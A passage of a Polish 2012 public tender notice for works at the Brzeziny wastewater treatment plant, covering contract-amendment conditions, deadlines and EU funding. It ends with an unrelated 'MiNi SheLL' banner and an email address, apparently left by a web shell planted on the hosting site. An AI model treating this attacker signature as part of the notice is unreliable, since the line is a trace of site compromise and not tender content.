W związku z art. 144 ustawy z dnia 29 stycznia 2004r. Prawo zamówień (Dz. U. z 2010r. Nr 113, poz. 759 z późn. zmian.) Zamawiający przewiduje możliwość zmiany postanowień Kontraktu w stosunku do treści Oferty na następujących warunkach: 
i.	wystąpienie siły wyższej wynikającej z definicji podanej w  Warunkach Ogólnych Kontraktu FIDIC - Czerwona Książka - Zamawiający dopuszcza korektę terminu wykonania Kontraktu na Roboty (Czas na Ukończenie, Termin Ukończenia Robót Fazy I), poprzez jego wydłużenie, w drodze stosownego Aneksu;
ii.	wystąpienie awarii obiektów i urządzeń na terenie Oczyszczalni ścieków w Brzezinach, które wystąpiły z przyczyn niezależnych od Wykonawcy, a które uniemożliwiają prawidłowe wykonywanie przedmiotu zamówienia - Zamawiający dopuszcza korektę terminu wykonania Kontraktu na Roboty (Czas na Ukończenie, Termin Ukończenia Robót Fazy I), poprzez jego wydłużenie, w drodze stosownego Aneksu;
iii.	wystąpienie katastrofy budowlanej - Zamawiający dopuszcza korektę terminu wykonania Kontraktu na Roboty (Czas na Ukończenie, Termin Ukończenia Robót Fazy I), poprzez jego wydłużenie, w drodze stosownego Aneksu;
iv.	występowanie niekorzystnych warunków atmosferycznych, mających istotny wpływ na prowadzone roboty budowlane, przez okres dłuższy niż 14 dni - Zamawiający dopuszcza korektę terminu wykonania Kontraktu na Roboty (Czas na Ukończenie, Termin Ukończenia Robót Fazy I), poprzez jego wydłużenie, w drodze stosownego Aneksu; 
v.	zmiana dokonana na podstawie art. 20 ust. 1 pkt. 4 lit. b) ustawy Prawo budowlane uzgodniona możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub Inżyniera - Zamawiający dopuszcza korektę Ceny Kontraktowej (zmniejszenie) w drodze stosownego Aneksu;
vi.	zaniechanie części Robót, jeżeli takie zaniechanie (rezygnacja) będzie niezbędna dla prawidłowej realizacji Kontraktu - Cena Kontraktowa ulegnie korekcie (zmniejszeniu) w drodze stosownego Aneksu;
vii.	zmiany dokonane podczas wykonywania robót i nie odstępujące w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36a ust. 5 ustawy Prawo budowlane i dokonane zostaną zgodnie z zapisami art. 36a ust. 6 ustawy Prawo budowlane, spełniając zapisy art. 57 ust. 2 ustawy Prawo budowlane - Zamawiający dopuszcza korektę Ceny Kontraktowej (zmniejszenie) w drodze stosownego Aneksu;
viii.	zmiana kluczowego personelu wymienionego w Ofercie Wykonawcy z przyczyn niezależnych od Wykonawcy - zmiana nie będzie wymagała Aneksu do Kontraktu;
ix.	nastąpi zmiana powszechnie obowiązującego prawa w zakresie mającym wpływ na realizację Kontraktu na Roboty - Zamawiający dopuszcza korektę terminu wykonania Kontraktu na Roboty (Czas na Ukończenie, Termin Ukończenia Robót Fazy I), poprzez jego wydłużenie, w drodze stosownego Aneksu;
x.	nastąpi zamiana stawki urzędowej VAT - Zamawiający dopuszcza korektę Ceny Kontraktowej w drodze stosownego Aneksu, przy czym zmianie ulegnie kwota VAT i kwota brutto;
xi.	zmiany dotyczące treści o charakterze informacyjnym i instrukcyjnym, niezbędne do realizacji Kontraktu, w szczególności zmiany dotyczące numeru rachunku bankowego Wykonawcy lub Zamawiającego, zmiany osób upoważnionych do komunikowania się, zmiany osób odpowiedzialnych za potwierdzanie prawidłowej realizacji Kontraktu wraz z adresami, numerami telefonów, telefaksów, adresów poczty elektronicznej itp. - zmiana nie będzie wymagała Aneksu do Kontraktu.
Zmiana Kontraktu dokonana z naruszeniem Prawa obowiązującego w Rzeczypospolitej Polskiej, w szczególności przepisów ustawy Prawo zamówień publicznych jest nieważna.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zuk-brzeziny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Komunalnych Sp. z o.o., ul. Przemysłowa 14, 95-060 Brzeziny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2012 godzina 10:00, miejsce: Zakład Usług Komunalnych Sp. z o.o., pokój nr 6, ul. Przemysłowa 14, 95-060 Brzeziny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w ramach Projektu pn. Uporządkowanie gospodarki wodno-ściekowej na terenie miasta Brzeziny współfinansowanego ze środków Unii Europejskiej z Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko na lata 2007-2013, priorytet I. Gospodarka wodno-ściekowa w ramach działania 1.1. Gospodarka wodno-ściekowa w aglomeracjach powyżej 15 tys. RLM
Termin wykonania zamówienia wskazany w pkt. II.2) obejmuje:
Czas na Ukończenie całości Robót: 30/09/2013
Termin Ukończenia Robót Fazy I - 90 dni od Daty Rozpoczęcia.
Okres Zgłaszania Wad - 36 miesięcy od daty wydania Świadectwa Przejęcia
Okres gwarancji jakości - 36 miesięcy od daty wydania  Świadectwie Przejęcia.
Rękojmia za wady - 36 miesięcy od daty wydania Świadectwa Przejęcia.
Ponadto:
w zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, w zakresie dotyczącym sprawozdania finansowego, należy przedłożyć sprawozdanie finansowe w części rachunku zysków i strat za okres 3 lat obrotowych (2009, 2010, 2011) a jeżeli okres prowadzenia działalności jest krótszy- za ten okres , z oznaczeniem podmiotu na rzecz którego został sporządzony, a jeżeli sprawozdanie finansowe podlega badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu w części dotyczącej rachunku zysków i strat. W przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające obroty oraz zobowiązania i należności, z których wynikać będą roczne przychody netto ze sprzedaży za okres jak w zdaniu poprzednim.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com